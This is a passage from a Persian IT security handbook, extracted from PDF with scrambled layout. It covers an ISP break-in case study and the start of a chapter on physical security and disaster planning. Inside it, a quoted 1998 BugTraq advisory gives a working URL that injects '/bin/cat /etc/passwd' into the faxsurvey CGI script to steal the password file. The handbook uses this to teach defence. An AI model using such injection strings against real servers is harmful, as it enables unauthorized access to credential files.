ﻻ ﺑـﺎ ﻋـﺪﻡ ﺗﻮﺟـﻪ ﺳـﺎﻳﺮﻳﻦ ﻣﻮﺍﺟـﻪ
ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﺴﻴﺎﺭ ﺧﺒﺮﻩ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺩﻳﮕﺮ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﻣﻲﺷﻮﺩ ﺩﺳﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻣﻮﺍﺭﺩ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﺯﺭﺳﻴﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺍﺯ ﺟﺮﺍﺋﻢ ﻛﻮﭼﻚ ،ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺭﺍ ﺑﻪ ﺳـﻤﺖ
ﺟﺮﺍﺋﻢ ﺑﺰﺭﮒ ﺍﻗﺘﺼﺎﺩﻱ ﻫﺪﺍﻳﺖ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻳﻚ ﺍﺧﺘﻼﻑ ﺣﺴﺎﺑﺮﺳﻲ ۷۵ﺳﻨﺘﻲ ﺑﺎﻋﺚ ﺷـﺪ ﻛـﻪ ﻛﻠﻴـﻒ ﺍﺳـﺘﻮﻝ ٥٠ﻳـﻚ
ﻧﻔﻮﺫﮔﺮ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﺭﺩﻳﺎﺑﻲ ﻛﻨﺪ ﻛﻪ ﺳﺮﺍﻧﺠﺎﻡ ﻣﺸﺨﺺ ﺷﺪ ﺑﻪ ﺩﺳﺘﻮﺭ ﺍﺗﺤﺎﺩ ﺟﻤﺎﻫﻴﺮ ﺷﻮﺭﻭﻱ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﻧﻈﺎﻣﻲ ﺍﻳﺎﻻﺕ
ﻣﺘﺤﺪﻩ ﻧﻔﻮﺫ ﻛﺮﺩﻩ ﺍﺳﺖ) .ﺩﺍﺳﺘﺎﻧﻲ ﻛﻪ ﺟﺰﺋﻴﺎﺕ ﺁﻥ ﺩﺭ ﻧﻤﺎﻳﺸﻨﺎﻣﻪ ﭘﻠﻴﺴﻲ "ﻧﻔﻮﺫﮔﺮ ﻛﻼﺳﻴﻚ" ٥١ﺍﺳﺘﻮﻝ؛ "ﺗﺨﻢ ﻣﺮﻍ ﻛﺎﻛﻮ" ٥٢ﺁﻣﺪﻩ ﺍﺳﺖ(.
ﻭﻗﺘﻲ ﻣﺴﺌﻠﻪ ﺭﻭﺷﻦ ﺷﺪ ،ﻣﻌﻠﻮﻡ ﺷﺪ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺩﺭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺮﺑﻮﻁ ﺑﻪ faxsurveyﺣﺪﻭﺩ ﺳﻪ ﻣﺎﻩ ﻗﺒـﻞ ﺍﺯ ﺍﻧﺠـﺎﻡ ﺣﻤﻠـﻪ ﺩﺭ ﮔـﺮﻭﻩ
ﭘﺴﺘﻲ BugTraqﮔﺰﺍﺭﺵ ﺷﺪﻩ ﺑﻮﺩ .ﻳﺎ ﻛﺴﻲ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ISPﭘﻴﺎﻣﻬﺎﻱ ﮔﺮﻭﻩ ﭘﺴﺘﻲ BugTraqﺭﺍ ﻧﺨﻮﺍﻧﺪﻩ ﺑﻮﺩ ،ﻳﺎ ﺍﻳﻨﻜﻪ ﻛـﺴﻲ ﺧﺒـﺮ
ﻧﺪﺍﺷﺖ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺮﺑﻮﻁ ﺑﻪ faxsurveyﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻧﺼﺐ ﺷﺪﻩ ﺍﺳﺖ:
Tue, 4 Aug 1998 07:41:24 -0700
dod@muenster.net
>Tom <dod@MUENSTER.NET
remote exploit in faxsurvey cgi-script
Date:
Reply-To:
From:
Subject:
!Hi
There exist a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any
command s/he wants with the permissions of the HTTP-Server.
All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think also older ones) with the HylaFAX package
installed are vulnerable to this attack.
AFAIK the problem exists in the call of 'eval'.
>I notified the S.u.S.E. team (suse.de) about that problem. Burchard Steinbild <bs@suse.de
told me, that they have not enough time to fix that bug for their 5.3 Dist., so they decided to just
remove the script from the file list.
ﭘﺲ ﺍﺯ ﺗﻬﺎﺟﻢ ISP ،ﺗﻤﻴﺰﻛﺎﺭﻱﻫﺎﻱ ﺯﻳﺮ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﺍﺩ:
Cliff Stoll
Classic Hacker
The Cuckoo's Egg
50
51
52
ﺑﺨﺶ ﭘﻨﺠﻢ
All the attacker has to do is type http://joepc.linux.elsewhere.org/cgibin/faxsurvey?/bin/cat%20/etc/passwd in his favorite Web-Browser to get a copy of your
Password-File.
٢٧٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
•
ﻳﻚ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻓﻮﺭﻱ ﺍﺯ ﻫﻤﻪ ﺩﻳﺴﻜﻬﺎ ﺗﻬﻴﻪ ﺷﺪ .ﺍﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻌﻨﻮﺍﻥ ﺷﺎﻫﺪﻱ ﺑﺮ ﻛﺸﻒ ﺍﻳﻦ ﺗﺨﺮﻳﺐ ﻛـﻪ ﻧﻴـﺎﺯ ﺑـﻪ ﭘﻴﮕﻴـﺮﻱ
ﺩﺍﺷﺖ ﻧﮕﻬﺪﺍﺭﻱ ﺷﺪ.
•
ﺳﻴﺴﺘﻢ ﺑﺪﻧﺒﺎﻝ ﻓﺎﻳﻠﻬﺎﻱ ﺑﺎ ﻣﺠﻮﺯﻫﺎﻱ ﺟﺪﻳﺪ ﭘﻮﻳﺶ ﺷﺪ .ﻫﻴﭻ ﻓﺎﻳﻠﻲ ﭘﻴﺪﺍ ﻧﺸﺪ.
•
ﺩﺳﺘﺮﺳﻴﻬﺎ ﺩﺭ ﺷﺎﺧﻪ /usr/includeﻭ ﻛﺎﻣﭙﺎﻳﻠﺮ Cﻃﻮﺭﻱ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺖ ﻛﻪ ﺗﻨﻬﺎ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻦ ﻓﺎﻳﻠﻬـﺎ ﺩﺳﺘﺮﺳـﻲ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻨﺪ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺟﺪﻳﺪ ﺭﺍ ﻛﺎﻣﭙﺎﻳﻞ ﻛﻨﻨﺪ.
•
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﻠﻴﺪﻱ ﺑﺎ ﻧﺴﺨﻪ ﻣﻨﺘﺸﺮﺷﺪﺓ ﺍﻭﻟﻴﻪ ﺭﻭﻱ ﺩﻳﺴﮑﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻣﻘﺎﻳﺴﻪ ﺷﺪﻧﺪ ﺗﺎ ﺗﻐﻴﻴﺮﺍﺕ ﺍﺣﺘﻤﺎﻟﻲ ﻣـﺸﺨﺺ ﺷـﻮﺩ .ﺩﺭ ﺁﻧﻬـﺎ
ﺗﻐﻴﻴﺮﻱ ﺍﻳﺠﺎﺩ ﻧﺸﺪﻩ ﺑﻮﺩ.
•
ﻫﻤﺔ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺑﻄﻮﺭ ﺩﺳﺘﻲ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﺿﺎﻓﻪ ﻣﺸﻜﻮﻙ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻨﺪ .ﻣﻮﺭﺩﻱ ﭘﻴﺪﺍ ﻧﺸﺪ.
•
ﭘﺲ ﺍﺯ ﻳﻚ ﻫﻔﺘﻪ ﺿﺎﺑﻄﺔ ﻣﺴﻴﺮﻳﺎﺏ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ SplitRockﺭﺍ ﻣﺴﺪﻭﺩ ﻣﻲﻛﺮﺩ ﻟﻐﻮ ﺷﺪ.
٢٧٩
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﺼﻞ ﺳﻮﻡ
ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ
ﻛﻠﻴﺎﺕ
ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ" ﻫﻤﺔ ﻛﺎﺭﻫﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﭘﻴﺶ ﺍﺯ ﺗﺎﻳﭗ ﻓﺮﺍﻣﻴﻦ ﺭﻭﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ؛ ﻣﺜﻞ ﺳﺎﺧﺘﻦ ﺳﻴﺴﺘﻢ ﺍﻋﻼﻡ ﺧﻄـﺮ ،ﻗﻔـﻞ
ﻛﺮﺩﻥ ﻳﻚ ﻛﻠﻴﺪ ﺭﻭﻱ ﻣﻨﺒﻊ ﺑﺮﻕ ﺭﺍﻳﺎﻧﻪ ،ﺍﺗﺎﻗﻚ ﻗﻔﻞﺷﺪﻩ ﻭ ﻣﺠﻬﺰ ﺑﻪ ﺩﻭﺭﺑﻴﻦ ﻣﺪﺍﺭﺑﺴﺘﺔ ﺭﺍﻳﺎﻧﻪ ،ﻭ ﻣﻘﺴﻢﻫﺎﻱ ﺑﺮﻕ ﻭ ﻣﻨﺒﻊ ﺑﺮﻕ ﻭﻗﻔﻪﻧﺎﭘـﺬﻳﺮ
) .٥٣(UPSﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻣﺴﺌﻠﻪ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﺍﺳﺖ ﻏﺎﻟﺒﹰﺎ ﻧﺎﺩﻳﺪﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ .ﺍﻳﻦ ﻓﺼﻞ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺍﻣﻨﻴـﺖ
ﻓﻴﺰﻳﻜﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ ،ﺍﺯ ﺟﻤﻠﻪ ﺧﻄﺮﺍﺕ ﻣﺤﻴﻄﻲ ،ﺧﺮﺍﺑﻜﺎﺭﻱ ﻭ ﺳﺮﻗﺖ؛ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺑﺮﺍﻱ ﻧﺤـﻮﺓ ﺑﺮﺧـﻮﺭﺩ ﺑـﺎ ﺁﻧﻬـﺎ ﺍﺭﺍﺋـﻪ
ﻣﻲﻛﻨﺪ.
ﻋﻨﺎﺻﺮ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ
ﺍﻭﻝ ﻣﺮﺩﻡ
ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻛﻴﺪ ﻧﻴﺴﺖ ﻛﻪ ﺩﺭ ﺷﺮﺍﻳﻂ ﺍﺿﻄﺮﺍﺭﻱ ﻭ ﺳﻮﺍﻧﺢ ،ﺯﻧﺪﮔﻲ ﻭ ﺍﻳﻤﻨﻲ ﭘﺮﺳﻨﻞ ﻫﻤﻮﺍﺭﻩ ﺑﺎﻳﺪ ﺑﺮ ﺩﺍﺩﻩﻫﺎ ﻳﺎ ﺗﺠﻬﻴﺰﺍﺕ ﻣﺪ ﻧﻈﺮ ﻣﻘﺪﻡ ﺑﺎﺷـﺪ.
ﺍﮔﺮﭼﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺍﻳﻦ ﺍﺻﻞ ﺍﺳﺘﺜﻨﺎﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻣﺤﺪﻭﺩﻱ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﻣﺜ ﹰﻼ ﺩﺭ ﺷﺮﺍﻳﻂ ﺣﺴﺎﺱ ﻧﻈﺎﻣﻲ( ،ﺍﻣﺎ ﻫﻴﭽﮕﺎﻩ ﻧﺒﺎﻳﺪ ﺁﻧﭽﻪ
ﺭﺍ ﻛﻪ ﺣﻘﻴﻘﺘﹰﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺍﺳﺖ ﺍﺯ ﻧﻈﺮ ﺩﻭﺭ ﺩﺍﺷﺖ.
ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﺗﻬﺪﻳﺪﺍﺕ ﻓﺮﺍﻣﻮﺵﺷﺪﻩ
ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﮔﻤﺎﻥ ﻣﻲﻛﻨﻨﺪ ﻣﻮﺍﺟﻬﺔ ﺻﺤﻴﺢ ﺑﺎ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﻳﺎ ﻣﺸﻜﻞ ﺍﺳﺖ .ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻤﻲ ﺗﻮﺍﻧﺎﻳﻲ ﺁﻧﺮﺍ ﺩﺍﺭﻧـﺪ ﻛـﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺣﻤﻼﺕ ﻫﺴﺘﻪﺍﻱ ،ﺯﻣﻴﻦﻟﺮﺯﻩﻫﺎﻱ ﺑﺰﺭﮒ ،ﻳﺎ ﺑﻤﺐﮔﺬﺍﺭﻱﻫﺎﻱ ﺗﺮﻭﺭﻳﺴﺘﻲ ﺣﻔﺎﻇﺖ ﻛﻨﻨﺪ؛ ﺍﻣﺎ ﻫﺮﮔﺰ ﻧﺒﺎﻳﺪ ﺑـﻪ
ﺑﻬﺎﻧﺔ ﺧﻨﺜﻲ ﺷﺪﻥ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻓﺎﺟﻌﻪﺁﻣﻴﺰ ،ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺍﺯ ﺍﻧﺠﺎﻡ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺩﻗﻴﻖ ﺑﺮﺍﻱ ﻣﻮﺍﺭﺩ ﻧﺎﮔﻮﺍﺭ ﺑﺎﺯ ﺩﺍﺭﻳﻢ.
Uninterruptable Power Supply
53
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﺎ ﻛﻤﺎﻝ ﺗﻌﺠﺐ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺗﻮﺟﻬﻲ ﻧﺪﺍﺭﻧﺪ .ﻳﻚ ﻛﺎﻧﻮﻥ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺩﺭ ﻧﻴﻮﻳﻮﺭﻙ ﻛﻪ ﺩﺍﺋﻤـﹰﺎ ﻣـﻮﺭﺩ ﺩﺳـﺘﺒﺮﺩ
ﻗﺮﺍﺭ ﻣﻲﮔﺮﻓﺖ ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﺩﻻﺭ ﺩﺭ ﺯﻣﻴﻨﺔ ﺁﺯﻣﺎﻳﺸﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻛﺮﺩ ﺗﺎ ﺍﺯ ﻭﺭﻭﺩﻫﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺭ ﺧﻼﻝ ﺭﻭﺯ ﺟﻠـﻮﮔﻴﺮﻱ
ﻛﻨﺪ ،ﺍﻣﺎ ﺑﻌﺪ ﺍﺯ ﻣﺪﺗﻲ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪ ﻛﻪ ﻣﺸﮑﻞ ﺁﻧﺠﺎ ﺍﺳﺖ ﮐﻪ ﺷﺒﻬﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻧﻈﺎﻓﺘﭽﻲ ﺳﺎﻟﻦ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺭﺍ ﺗﻤﻴﺰ ﻣـﻲﻛﻨـﺪ ﺩﺭﻫـﺎﻱ
ﻭﺭﻭﺩﻱ ﺁﻧﺮﺍ ﺑﺎﺯ ﻣﻲﮔﺬﺍﺭﺩ .ﻣﺠﻠﻪﺍﻱ ﺩﺭ San Franciscoﺩﺭ ﻃﻮﻝ ﻳﻚ ﺭﻭﺯ ﺗﻌﻄﻴﻞ ﻣﻌﺎﺩﻝ ﺑﻴﺶ ﺍﺯ ﻳﻜﺼﺪ ﻫﺰﺍﺭ ﺩﻻﺭ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺶ ﺑﻪ
ﺳﺮﻗﺖ ﺭﻓﺘﻨﺪ ،ﭼﻮﻥ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﻛﺎﺭﺕ ﻛﻠﻴﺪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺑﺮﺍﻱ ﺑﺎﺯ ﻛﺮﺩﻥ ﺩﺭﺏ ﺳﺎﺧﺘﻤﺎﻥ ﻭ ﺍﺯ ﻛﺎﺭ ﺍﻧـﺪﺍﺧﺘﻦ ﺳﻴـﺴﺘﻢ ﺍﻋـﻼﻡ
ﺧﻄﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﻮﺩ .ﺍﻳﻦ ﻓﺮﺩ ﭘﺲ ﺍﺯ ﻭﺭﻭﺩ ﺑﻪ ﺳﺎﺧﺘﻤﺎﻥ ﺑﻪ ﻣﻮﺗﻮﺭﺧﺎﻧﻪ -ﺟﺎﻳﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺍﻋﻼﻡ ﺧﻄﺮ ﺩﺭ ﺁﻧﺠـﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ -ﺭﻓﺘـﻪ
ﺑﻮﺩ؛ ﻭ ﮔﺰﺍﺭﺵ ﻣﻜﺘﻮﺏ ﺭﺍ ﻧﻴﺰ ﺍﺯ ﭼﺎﭘﮕﺮ ﺩﺳﺘﮕﺎﻩ ﺍﻋﻼﻡ ﺧﻄﺮ ﺑﻴﺮﻭﻥ ﻛﺸﻴﺪﻩ ﻭ ﻣﻨﻬﺪﻡ ﻛﺮﺩﻩ ﺑﻮﺩ.
٢٨٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻼ ﺑﺮﺍﻱ ﭘﺎﻳﮕﺎﻫﻬﺎ ﻳﺎ ﻣﺆﺳـﺴﺎﺕ ﻣﺨﺘﻠـﻒ ،ﻣﺘﻔـﺎﻭﺕ
ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺷﺎﻣﻞ ﺁﻧﻬﺎ ﻣﻲﺷﻮﺩ -ﺗﻬﺪﻳﺪﻫﺎ ،ﺗﺠﺎﺭﺏ ،ﻭ ﺣﻔﺎﻇﻬﺎ -ﻋﻤ ﹰ
ﻫﺴﺘﻨﺪ .ﭼﻮﻥ ﻫﺮ ﭘﺎﻳﮕﺎﻩ ﺑﺎ ﭘﺎﻳﮕﺎﻩ ﺩﻳﮕﺮ ﺗﻔﺎﻭﺕ ﺩﺍﺭﺩ ،ﺍﻳﻦ ﻓﺼﻞ ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺧﺎﺹ ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﻨﺪ ﻭ ﺗﻨﻬﺎ ﻣـﻲﺗﻮﺍﻧـﺪ
ﻳﻚ ﻧﻘﻄﻪ ﺷﺮﻭﻉ ،ﻳﻚ ﻓﻬﺮﺳﺖ ﺍﺯ ﻣﺴﺎﺋﻞ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪ ،ﻭ ﻳﻚ ﺭﻭﻳﻪ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺑﺮﺍﻱ ﻓﺮﻣﻮﻝﺑﻨﺪﻱ ﺑﺮﻧﺎﻣﻪ ﻭﺍﻗﻌﻲ ﺍﺭﺍﺋﻪ ﻧﻤﺎﻳﺪ.
ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ
ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺍﻳﻤﻦﺳﺎﺯﻱ ﻓﻴﺰﻳﻜﻲ ﺗﺄﺳﻴﺴﺎﺕ ﺷﻤﺎ ﻓﺮﻣﻮﻝﺑﻨﺪﻱ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﻜﺘﻮﺏ ﺍﺳﺖ ﻛﻪ ﻧﻴﺎﺯﻫﺎﻱ ﻓﻌﻠﻲ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻭ ﺳﻤﺖ ﻭ ﺳﻮﻱ
ﻣﻮﺭﺩ ﻧﻈﺮ ﺷﻤﺎ ﺩﺭ ﺁﻳﻨﺪﻩ ﺭﺍ ﻧﺸﺎﻥ ﺩﻫﺪ .ﺑﻄﻮﺭ ﺍﻳﺪﻩﺁﻝ ،ﺑﺮﻧﺎﻣﺔ ﻓﻴﺰﻳﻜﻲ ﺑﺎﻳﺪ ﺑﺨﺸﻲ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻜﺘـﻮﺏ ﺷـﻤﺎ ﺑﺎﺷـﺪ .ﺍﻳـﻦ ﻃـﺮﺡ
ﺑﺮﺍﻱ ﺗﻜﺎﻣﻞ ﻻﺯﻡ ﺍﺳﺖ ﺗﻮﺳﻂ ﺳﺎﻳﺮ ﺍﻋﻀﺎ ﺧﻮﺍﻧﺪﻩ ﺷﻮﺩ ،ﻭ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻣﺪﻳﺮﻳﺖ ﺍﺭﺷﺪ ﺳﺎﺯﻣﺎﻥ ﻧﻴﺰ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﺪﻑ ﺍﺯ ﺑﺮﻧﺎﻣﻪ،
ﻫﻢ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻭ ﻫﻢ ﺍﺗﺨﺎﺫ ﺗﺪﺍﺑﻴﺮ ﺳﻴﺎﺳﻲ ﺍﺳﺖ.
ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﺷﻤﺎ ﺑﺎﻳﺪ ﺳﺮﻣﺎﻳﻪﻫﺎﻳﻲ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﻣﺤﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ ،ﺍﺭﺯﺵ ﺁﻧﻬﺎ ،ﻧﻘﺎﻃﻲ ﻛﻪ ﺍﻳﻦ ﺍﻗﻼﻡ ﺩﺭ ﺁﻥ ﻣﺴﺘﻘﺮ ﻫـﺴﺘﻨﺪ ،ﺗﻬﺪﻳـﺪﻫﺎﻱ
ﺍﺣﺘﻤﺎﻟﻲ ﻛﻪ ﺑﺎ ﺁﻧﻬﺎ ﻣﻮﺍﺟﻪ ﻣﻲﺷﻮﻧﺪ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﺭﺍ ﺗﻮﺻﻴﻒ ﻛﻨﺪ .ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻜﻲ ﺍﺯ ﺍﻗﻼﻡ
ﺳﺮﻣﺎﻳﻪ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ .ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻓﻀﺎﻱ ﻣﺤﻴﻄﻲ ﺍﻣﻨﻴﺖ -ﺣﺪ ﻭ ﻣﺮﺯ ﻣﻴﺎﻥ ﺳﺎﻳﺮ ﻗﺴﻤﺘﻬﺎﻱ ﺟﻬﺎﻥ ﻭ ﻧﺎﺣﻴﺔ ﺍﻣﻦ ﺷـﻤﺎ -ﻭ
ﻫﺮ ﺣﻔﺮﻩ ﺩﺭ ﻓﻀﺎﻱ ﻣﺤﻴﻄﻲ ،ﻫﻤﺮﺍﻩ ﺑﺎ ﺷﻴﻮﻩﻫﺎﻱ ﺩﻓﺎﻋﻲ ،ﻃﺮﺣﻬﺎﻱ ﻣﻘﺎﻭﻡﺳﺎﺯﻱ ﺁﻧﻬﺎ ،ﻭ ﻫﺰﻳﻨﺔ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻳﻦ ﻃﺮﺣﻬﺎ ﺭﺍ ﻣﺸﺨﺺ ﻛﻨﻴﺪ.
ﻼ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺑﻪ ﻳـﻚ ﺷـﺮﻛﺖ
ﺍﮔﺮ ﺗﺄﺳﻴﺴﺎﺕ ﺣﻴﺎﺗﻲ ﺧﺎﺻﻲ ﺭﺍ ﺍﺩﺍﺭﻩ ﻣﻲﻛﻨﻴﺪ ،ﺑﻪ ﺗﺪﻭﻳﻦ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺗﻮﺟﻪ ﺯﻳﺎﺩﻱ ﻧﺸﺎﻥ ﺩﻫﻴﺪ ﻭ ﻣﺜ ﹰ
ﺑﻴﺮﻭﻧﻲ ﻛﻪ ﺗﺨﺼﺼﺶ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﺧﻄﺮ ﺍﺳﺖ ﺑﺪﻫﻴﺪ .ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺭﺍ ﻳـﻚ ﻣـﺪﺭﻙ ﺣـﺴﺎﺱ ﺑـﺸﻤﺎﺭ
ﺁﻭﺭﻳﺪ؛ ﭼﺮﺍﮐﻪ ﺍﻳﻦ ﻃﺮﺡ ﻃﺒﻖ ﻃﺒﻴﻌﺖ ﺫﺍﺗﻲ ،ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺮﻭﺡ ﺩﺭ ﻣﻮﺭﺩ ﺿﻌﻴﻒﺗﺮﻳﻦ ﻧﻘﺎﻁ ﺩﻓﺎﻋﻲ ﺷﻤﺎ ﺍﺳﺖ.
ﺑﺮﻧﺎﻣﺔ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ
ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﻓﻮﺭﻱ ﻭ ﻣﻮﻗﺖ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺟﺪﻳﺪ ﺩﺭﺻـﻮﺭﺕ
